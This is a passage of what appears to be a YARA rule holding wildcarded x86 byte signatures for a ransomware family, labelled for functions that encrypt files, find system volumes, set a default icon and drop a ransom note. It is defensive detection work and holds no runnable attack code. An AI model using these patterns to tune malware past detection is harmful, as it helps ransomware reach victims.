8D 4D - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 84 C0 0F 44 CA 8D 45 ?? 50 E8 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ?? - ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 - } - $encrypt_files_v5_p1 = { - 50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D 45 ?? 50 56 FF 15 ?? ?? - ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? - 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C7 45 ?? ?? ?? ?? ?? 8D 4B ?? E8 ?? - ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B C2 ?? ?? 8B 7D ?? 83 - C1 ?? 8B 35 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B 7D ?? - 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? - E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ?? - FF 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? FF 75 ?? 83 - } - $encrypt_files_v5_p2 = { - C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C ?? 81 FF ?? ?? - ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0 66 0F 13 45 - ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CF 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2 50 51 E8 ?? - ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89 45 ?? F2 0F - 11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85 ?? ?? ?? ?? - 39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? - 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 85 - C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F 11 45 ?? 50 - E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D - ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 50 FF 75 ?? - FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ?? ?? ?? 89 45 - ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 FF 75 ?? 57 - 6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 57 - C0 66 0F 13 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B - 7D ?? 89 45 ?? 66 66 0F 1F 84 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B CF 0F A4 C8 ?? 6A ?? C1 E1 ?? 03 - 4D ?? 6A ?? 13 45 ?? 50 51 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 8B 45 ?? - 13 45 ?? 89 45 ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 7D ?? 0F 82 - } - $encrypt_files_v6_p1 = { - E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 85 F6 0F 8F ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 03 48 ?? 8B 01 FF 50 ?? 83 7B ?? ?? 8D 43 ?? - F2 0F 10 05 ?? ?? ?? ?? 0F 43 43 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? - ?? ?? 50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 8D 45 ?? 50 57 FF 15 - ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C6 45 ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B - C2 ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B CF 76 ?? 8B FE 2B 7D ?? 66 - 8B 04 0F 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? 2B 75 ?? D1 FE E9 ?? ?? ?? ?? 8B 7D - ?? 83 C6 ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B - 75 ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 - } - $encrypt_files_v6_p2 = { - 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? - 6A ?? E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? - ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? - FF 75 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C - } - $encrypt_files_v6_p3 = { - 81 FE ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0 - 66 0F 13 45 ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CE 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2 - 50 51 E8 ?? ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89 - 45 ?? F2 0F 11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85 - ?? ?? ?? ?? 39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? - ?? ?? ?? 85 C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FE ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10 - 05 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F - 11 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 C6 45 - ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 - 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ?? - ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 - FF 75 ?? 56 6A ?? 6A ?? 57 C6 45 ?? ?? 8B 4D - } - $set_default_icon_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 - 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? B0 ?? C7 45 ?? ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 98 - 66 31 44 4D ?? 41 83 F9 ?? 73 ?? 8A 45 ?? EB ?? 33 C0 56 66 89 45 ?? C6 45 ?? ?? 8D - 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 C7 45 - ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 C7 45 ?? - ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 - } - $set_default_icon_p2 = { - 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? - 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ?? - ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 6A ?? 66 89 45 ?? 8D 45 ?? 0F 43 - 45 ?? 6A ?? 6A ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 8D 4D - ?? 8B 45 ?? 0F 43 4D ?? 03 C0 50 51 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF - 75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 6A - ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 B8 ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 89 45 - ?? C6 45 ?? ?? 8B 4D ?? 5E 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 - ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? - ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3 - } - $find_system_volumes = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ?? - ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? C7 06 ?? ?? ?? ?? - C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 66 90 - 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 D2 C7 45 ?? ?? ?? ?? ?? 66 89 55 ?? - 83 C4 ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 0C 00 C7 45 ?? ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 03 C1 C7 45 ?? ?? ?? ?? ?? 3B D0 74 ?? D1 F9 8B C2 - 51 50 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 46 ?? 3B 46 ?? 74 ?? - 6A ?? 51 50 C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 46 ?? ?? 66 89 45 ?? - EB ?? 51 50 8B CE E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C - 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 - ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? 66 89 45 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? - 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C6 5F 5E 5B 64 89 0D ?? ?? ?? ?? 8B E5 5D C3 - } - $drop_ransom_note_v2_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 - 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? B9 ?? ?? ?? ?? 8B D8 2B CF 83 C4 ?? 3B CB 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? - 8D 0C 3B C7 45 ?? ?? ?? ?? ?? 0F 43 45 ?? BE ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B CE 76 ?? 8B F1 83 CE ?? 81 FE - ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 3B F0 0F 42 F0 8D 46 ?? 50 8D - 4D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 0C 3B 89 45 ?? 89 75 ?? 8D 34 3F 56 FF 75 ?? 89 4D - ?? 50 E8 ?? ?? ?? ?? 8B 7D ?? 8D 04 1B 50 68 ?? ?? ?? ?? 8D 0C 3E 51 E8 ?? ?? ?? ?? - 8B 45 ?? 33 C9 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 0C 47 C6 45 ?? ?? B8 ?? ?? ?? ?? - 83 3D ?? ?? ?? ?? ?? 8D 4D ?? FF 35 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 8B F0 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 C4 ?? 66 - } - $drop_ransom_note_v2_p2 = { - 89 06 BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B - 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B - 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 - ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 66 89 45 - ?? 8D 45 ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 8B F8 83 FF ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? - ?? 57 FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B 4D ?? 5F 5E 5B 83 F9 ?? 72 - ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B - C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D - ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_v5 = { - 50 FF 15 ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 - ?? C6 45 ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 - ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ?? - ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D - ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D - 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 8D 0C 41 89 4D ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 8D - 04 78 89 45 ?? 51 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8D 45 - } - $find_system_volumes_v2_p1 = { - C7 45 ?? ?? ?? ?? ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 68 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A - ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? 8D 04 41 50 8B C1 8D 4D ?? 50 - E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8B 4D ?? 3B 4D ?? 74 ?? 6A ?? 56 51 C7 01 ?? ?? ?? - ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? - ?? ?? C7 46 ?? ?? ?? ?? ?? C6 06 ?? 83 45 ?? ?? EB ?? 56 51 8D 4D ?? E8 ?? ?? ?? ?? - C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? - ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 75 ?? 33 C9 89 4D ?? B8 ?? - ?? ?? ?? 8B 4D ?? 2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 0F 84 ?? ?? ?? ?? 33 DB - 8D 4D ?? 8D 04 33 89 4D ?? C6 45 ?? ?? 8D 4D ?? 51 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 8D 4D ?? 83 CF ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? 83 E7 ?? 89 7D ?? C6 45 ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 3B 35 ?? ?? ?? ?? 74 ?? - 6A 